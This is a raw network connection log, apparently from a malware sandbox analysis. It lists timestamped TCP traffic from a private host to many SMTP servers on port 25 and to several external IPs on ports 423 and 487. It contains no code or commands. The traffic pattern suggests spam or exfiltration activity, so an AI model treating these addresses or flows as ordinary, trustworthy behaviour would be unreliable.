Sep 5, 2021 15:50:42.258909941 CEST	50035	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:42.258996010 CEST	50038	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:42.259176016 CEST	50037	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:42.259485960 CEST	50044	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:42.259888887 CEST	50045	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:42.260277987 CEST	50046	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:42.266145945 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.284318924 CEST	423	50037	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:42.284394979 CEST	50037	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:42.284476042 CEST	423	50045	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:42.284586906 CEST	50045	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:42.291297913 CEST	423	50038	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:42.291323900 CEST	423	50046	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:42.291409969 CEST	50038	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:42.291445017 CEST	50046	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:42.300477028 CEST	423	50035	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:42.300499916 CEST	423	50044	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:42.300534964 CEST	50035	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:42.300596952 CEST	50044	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:42.302872896 CEST	25	50043	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:42.305170059 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:42.308206081 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:42.311299086 CEST	423	50045	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:42.311506033 CEST	50045	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:42.313359022 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.315327883 CEST	50043	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:42.317012072 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.317044973 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.322897911 CEST	423	50046	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:42.323080063 CEST	50046	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:42.336396933 CEST	423	50045	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:42.343683004 CEST	423	50044	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:42.344182968 CEST	50044	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:42.356015921 CEST	423	50046	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:42.387747049 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.387765884 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.387845993 CEST	423	50044	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:42.388247013 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.388592005 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.388747931 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.427946091 CEST	25	50043	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:42.427970886 CEST	25	50043	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:42.434133053 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.434425116 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.434560061 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.434643984 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.434732914 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.434839964 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.434931993 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.435008049 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.435092926 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.435177088 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.436702013 CEST	50043	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:42.442538023 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:42.467014074 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:42.469419003 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.494292974 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:42.496541023 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:42.503907919 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506495953 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506522894 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506531000 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506544113 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506552935 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506566048 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506581068 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.506594896 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.547771931 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.547794104 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.552165985 CEST	25	50043	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:42.552195072 CEST	25	50043	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:42.552313089 CEST	50043	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:42.574040890 CEST	50043	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:42.590017080 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:42.608783960 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.608819962 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.609576941 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.643208027 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.643233061 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.643246889 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.643260002 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.643269062 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.678267956 CEST	50040	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:42.685674906 CEST	25	50043	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:42.747639894 CEST	487	50040	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:42.760828972 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.760854959 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:42.760963917 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:42.762931108 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:42.855982065 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:42.956746101 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:42.962079048 CEST	50036	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.008920908 CEST	50039	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.009419918 CEST	50048	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.009561062 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.009635925 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.015187025 CEST	25	50036	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.063647985 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.076421022 CEST	423	50048	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:43.076503038 CEST	50048	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.077840090 CEST	423	50039	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:43.077981949 CEST	50039	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.089032888 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.095002890 CEST	25	50024	209.222.82.255	192.168.2.4
Sep 5, 2021 15:50:43.095130920 CEST	50024	25	192.168.2.4	209.222.82.255
Sep 5, 2021 15:50:43.134093046 CEST	50041	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.134726048 CEST	50042	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.134778023 CEST	50049	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.135163069 CEST	50050	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.141801119 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.143907070 CEST	423	50048	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:43.144232988 CEST	50048	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.144588947 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.150834084 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:43.150865078 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:43.150872946 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:43.150882006 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:43.150895119 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:43.153192043 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.201700926 CEST	423	50042	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:43.201829910 CEST	50042	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.205315113 CEST	423	50049	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:43.205492020 CEST	50049	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.206233025 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.207781076 CEST	423	50041	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:43.207868099 CEST	50041	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.208369970 CEST	423	50050	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:43.208467960 CEST	50050	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.211205006 CEST	423	50048	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:43.218897104 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.259111881 CEST	50044	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.259169102 CEST	50046	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.259176970 CEST	50045	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.276000977 CEST	423	50049	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:43.276110888 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.283205032 CEST	423	50050	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:43.284271002 CEST	423	50045	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.284352064 CEST	50045	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.290458918 CEST	423	50046	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.290585995 CEST	50046	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.295851946 CEST	50051	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.296062946 CEST	50052	25	192.168.2.4	148.163.156.240
Sep 5, 2021 15:50:43.296952009 CEST	50053	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.297518969 CEST	50054	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.297790051 CEST	50049	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.298027039 CEST	50050	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.300543070 CEST	423	50044	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:43.300661087 CEST	50044	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.322108984 CEST	423	50053	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.322247982 CEST	50053	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.329114914 CEST	423	50054	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.329233885 CEST	50054	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.336694956 CEST	423	50051	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:43.336812973 CEST	50051	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.347819090 CEST	423	50053	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.348077059 CEST	50053	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.361242056 CEST	423	50054	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.361552954 CEST	50054	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.367655039 CEST	423	50049	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:43.371362925 CEST	423	50050	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:43.374694109 CEST	423	50053	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.377764940 CEST	423	50051	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:43.378031015 CEST	50051	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.393325090 CEST	423	50054	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.418760061 CEST	423	50051	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:43.465818882 CEST	25	50052	148.163.156.240	192.168.2.4
Sep 5, 2021 15:50:43.465950012 CEST	50052	25	192.168.2.4	148.163.156.240
Sep 5, 2021 15:50:43.511153936 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.537305117 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.590080023 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.590361118 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.591883898 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:43.607605934 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:43.637995005 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.655752897 CEST	25	50052	148.163.156.240	192.168.2.4
Sep 5, 2021 15:50:43.675066948 CEST	50052	25	192.168.2.4	148.163.156.240
Sep 5, 2021 15:50:43.686508894 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:43.690973997 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.691020966 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.691032887 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.691051006 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.691093922 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.712188959 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:43.712297916 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:43.738442898 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:43.790198088 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:43.806726933 CEST	50056	25	192.168.2.4	148.163.152.163
Sep 5, 2021 15:50:43.817711115 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.817734957 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.817842007 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.827626944 CEST	50047	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:43.845465899 CEST	25	50052	148.163.156.240	192.168.2.4
Sep 5, 2021 15:50:43.845491886 CEST	25	50052	148.163.156.240	192.168.2.4
Sep 5, 2021 15:50:43.845588923 CEST	50052	25	192.168.2.4	148.163.156.240
Sep 5, 2021 15:50:43.845632076 CEST	50052	25	192.168.2.4	148.163.156.240
Sep 5, 2021 15:50:43.852907896 CEST	50048	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.853393078 CEST	50057	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.880296946 CEST	25	50047	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:43.899638891 CEST	50049	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.899645090 CEST	50050	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.899723053 CEST	50051	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.900270939 CEST	50058	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.900278091 CEST	50054	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.900497913 CEST	50053	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.900706053 CEST	50059	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.901091099 CEST	50060	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.901509047 CEST	50061	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.902041912 CEST	50062	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.903779030 CEST	25	50031	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:43.903851986 CEST	50031	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:43.920197964 CEST	423	50048	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:43.920289040 CEST	50048	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.925434113 CEST	423	50057	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:43.925810099 CEST	50057	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:43.925827980 CEST	25	50056	148.163.152.163	192.168.2.4
Sep 5, 2021 15:50:43.925919056 CEST	50056	25	192.168.2.4	148.163.152.163
Sep 5, 2021 15:50:43.926495075 CEST	423	50061	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.926585913 CEST	50061	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.926778078 CEST	423	50053	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.927088022 CEST	50053	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.931962013 CEST	423	50054	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.932087898 CEST	50054	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.934024096 CEST	423	50062	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.934583902 CEST	50062	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.940885067 CEST	423	50051	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:43.940973997 CEST	50051	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.942729950 CEST	423	50060	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:43.942867994 CEST	50060	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.952923059 CEST	423	50061	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.953208923 CEST	50061	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:43.955533028 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:43.966188908 CEST	423	50062	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.966428041 CEST	50062	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:43.969639063 CEST	423	50049	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:43.969822884 CEST	50049	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.973108053 CEST	423	50050	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:43.973191977 CEST	50050	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.973530054 CEST	423	50058	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:43.973623037 CEST	50058	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:43.978079081 CEST	423	50061	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:43.983684063 CEST	423	50059	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:43.983778000 CEST	50059	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:43.984232903 CEST	423	50060	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:43.984457970 CEST	50060	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:43.997713089 CEST	423	50057	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:43.997735977 CEST	423	50062	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:43.997953892 CEST	50057	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:44.025504112 CEST	423	50060	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:44.029095888 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.029216051 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.047482014 CEST	423	50058	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:44.047673941 CEST	50058	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:44.065535069 CEST	423	50059	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:44.065727949 CEST	50059	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:44.070117950 CEST	423	50057	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:44.088226080 CEST	25	50056	148.163.152.163	192.168.2.4
Sep 5, 2021 15:50:44.104187012 CEST	50056	25	192.168.2.4	148.163.152.163
Sep 5, 2021 15:50:44.121656895 CEST	423	50058	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:44.128691912 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.147945881 CEST	423	50059	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:44.203140974 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.224847078 CEST	25	50056	148.163.152.163	192.168.2.4
Sep 5, 2021 15:50:44.224893093 CEST	25	50056	148.163.152.163	192.168.2.4
Sep 5, 2021 15:50:44.225047112 CEST	50056	25	192.168.2.4	148.163.152.163
Sep 5, 2021 15:50:44.228328943 CEST	50056	25	192.168.2.4	148.163.152.163
Sep 5, 2021 15:50:44.276947975 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.321326017 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.325299025 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.325362921 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.341665030 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:44.400113106 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.400335073 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.400361061 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.400569916 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.400799036 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.457813025 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.458045006 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458170891 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458220005 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458281040 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458362103 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458441973 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458508015 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458564997 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458625078 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.458683014 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.477773905 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:44.531786919 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.532059908 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.532116890 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.532656908 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.533241034 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.533673048 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.533873081 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.534041882 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.534523964 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.534666061 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.555860043 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.555912018 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.555970907 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.560538054 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:44.572057962 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.572132111 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.572391033 CEST	50063	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:44.586299896 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:44.586687088 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:44.645915985 CEST	487	50063	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:44.790370941 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:45.028481960 CEST	50061	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:45.032166004 CEST	50055	25	192.168.2.4	52.47.149.86
Sep 5, 2021 15:50:45.033246994 CEST	50064	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:45.054244995 CEST	423	50061	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:45.054344893 CEST	50061	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:45.058139086 CEST	423	50064	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:45.058263063 CEST	50064	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:45.083883047 CEST	423	50064	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:45.084186077 CEST	50064	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:45.100097895 CEST	25	50055	52.47.149.86	192.168.2.4
Sep 5, 2021 15:50:45.109368086 CEST	423	50064	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:45.493601084 CEST	50057	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:45.493618965 CEST	50059	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:45.493632078 CEST	50058	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:45.493685007 CEST	50060	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:45.493710995 CEST	50062	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:45.497073889 CEST	50065	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:45.497689962 CEST	50066	25	192.168.2.4	62.141.42.208
Sep 5, 2021 15:50:45.497781992 CEST	50067	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:45.497921944 CEST	50068	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:45.498178959 CEST	50069	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:45.499142885 CEST	50070	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:45.499733925 CEST	50071	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:45.500299931 CEST	50072	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:45.500848055 CEST	50073	423	192.168.2.4	5.61.37.41
